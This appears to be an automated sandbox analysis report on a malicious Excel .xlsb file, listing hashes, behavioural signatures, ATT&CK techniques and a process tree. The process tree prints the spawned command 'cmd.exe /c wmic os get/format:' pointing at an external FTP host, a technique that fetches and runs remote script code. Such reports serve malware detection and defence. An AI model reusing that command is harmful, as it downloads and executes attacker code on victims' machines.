Analysis

  • max time kernel
    147s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    12-04-2023 04:05

General

  • Target

    b846fa8bc3a55fa0490a807186a8ece9.xlsb

  • Size

    79KB

  • MD5

    b846fa8bc3a55fa0490a807186a8ece9

  • SHA1

    c0c6b99796d732fa53402ff49fd241612a340229

  • SHA256

    855656bfecc359a1816437223c4a133359e73ecf45acda667610fbe7875ab3c8

  • SHA512

    18fb97b1a198b4a1336d52e5a363b44ef2d73875fe3b9f6828349403a2b80bcb8e432a37f4672d0f4224d70f28d5112ee897da692e1dc3a02edbf55576b64681

  • SSDEEP

    1536:s1YKo7aGH8sVHLPzWm4z5eDr6tMEpQGzGo+47hPOV4ko+dNT6MuSS98X:+o7VcsVrd4zC6tMEpso+eE/eMzS6

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\b846fa8bc3a55fa0490a807186a8ece9.xlsb
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /cwmic os get/format:"ftp://0:0@trip.greenulz.com/profile/frontend"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1524
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic os get/format:"ftp://0:0@trip.greenulz.com/profile/frontend"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1476

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2032-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB